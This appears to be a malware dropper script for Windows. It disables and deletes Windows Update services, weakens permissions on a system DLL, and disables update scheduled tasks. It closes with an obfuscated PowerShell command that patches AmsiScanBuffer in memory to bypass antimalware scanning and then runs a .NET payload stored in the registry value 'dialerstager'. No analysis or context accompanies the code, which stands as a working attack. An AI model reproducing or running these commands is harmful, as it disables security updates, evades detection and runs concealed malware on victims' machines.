sc stop UsoSvc
sc stop WaaSMedicSvc
sc stop wuauserv
sc stop bits
sc stop dosvc
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll
icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:uVloTgFhZlij{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hZoxNFljRapLPB,[Parameter(Position=1)][Type]$ZUdgkPnljG)$tbBBUAzXmVo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$tbBBUAzXmVo.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hZoxNFljRapLPB).SetImplementationFlags('Runtime,Managed');$tbBBUAzXmVo.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ZUdgkPnljG,$hZoxNFljRapLPB).SetImplementationFlags('Runtime,Managed');Write-Output $tbBBUAzXmVo.CreateType();}$JzfARGytmCFRp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$NOrFjfpVbHbkYq=$JzfARGytmCFRp.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lMTIEQZCYYaUuCbhxkE=uVloTgFhZlij @([String])([IntPtr]);$gpuVBVoFPOsSXHQsCwtdSe=uVloTgFhZlij @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rcpwKvUOaFj=$JzfARGytmCFRp.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$mXmsIcxOnRlHtJ=$NOrFjfpVbHbkYq.Invoke($Null,@([Object]$rcpwKvUOaFj,[Object]('Load'+'LibraryA')));$AqTzBSIQsksrUzcow=$NOrFjfpVbHbkYq.Invoke($Null,@([Object]$rcpwKvUOaFj,[Object]('Vir'+'tual'+'Pro'+'tect')));$tdMZuAJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mXmsIcxOnRlHtJ,$lMTIEQZCYYaUuCbhxkE).Invoke('a'+'m'+'si.dll');$vmKiPAnYKfLXkoNxb=$NOrFjfpVbHbkYq.Invoke($Null,@([Object]$tdMZuAJ,[Object]('Ams'+'iSc'+'an'+'Buffer')));$wORJDOKjEA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AqTzBSIQsksrUzcow,$gpuVBVoFPOsSXHQsCwtdSe).Invoke($vmKiPAnYKfLXkoNxb,[uint32]8,4,[ref]$wORJDOKjEA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$vmKiPAnYKfLXkoNxb,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AqTzBSIQsksrUzcow,$gpuVBVoFPOsSXHQsCwtdSe).Invoke($vmKiPAnYKfLXkoNxb,[uint32]8,0x20,[ref]$wORJDOKjEA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"